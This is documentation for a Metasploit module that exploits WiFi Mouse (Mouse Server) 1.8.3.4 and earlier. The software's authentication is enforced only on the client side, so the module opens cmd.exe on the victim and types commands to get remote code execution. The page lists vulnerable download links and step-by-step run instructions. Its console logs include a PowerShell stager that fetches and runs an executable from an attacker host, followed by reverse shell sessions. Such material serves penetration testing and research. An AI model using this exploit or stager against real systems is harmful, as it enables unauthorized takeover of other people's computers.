## Vulnerable Application

The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
authentication is implemented entirely on the client side. By utilizing this
vulnerability, it is possible to open a program on the server (cmd.exe
in our case) and type commands resulting in an RCE.

Versions 1.8.3.4 (current as of module writing) and before are vulnerable.

Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe
at the time of writing.

Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe

Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe) or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe

Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe
## Targets

### Stager

This is Metasploit's cmd stager, it has two flavors which can be changed through the advanced option
`CMDSTAGER::FLAVOR`.

1. `psh_invokewebrequest` (default) this one types the command and pulls back the payload nice and fast.
You should use it in almost all circumstances.
2. `certutil`  typing of the payload appears on the user's screen, and is thus unreliable
(needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail.


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/wifi_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.

### LINEMAX

How long each line should be that is sent for processing. While the program
seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
Defaults to `1020`.

## Scenarios

###  Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager

```
resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
[*] 2.2.2.2:1978 - Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Windows\system32>whoami
whoami
win10prolicense\windows

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

### Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using `certutil` Stager

```
resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
CMDSTAGER::FLAVOR => certutil
msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
verbose => false
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
...
[*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Program Files (x86)\MouseServer.exe>whoami
whoami
win10prolicense\windows

C:\Program Files (x86)\MouseServer.exe>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```
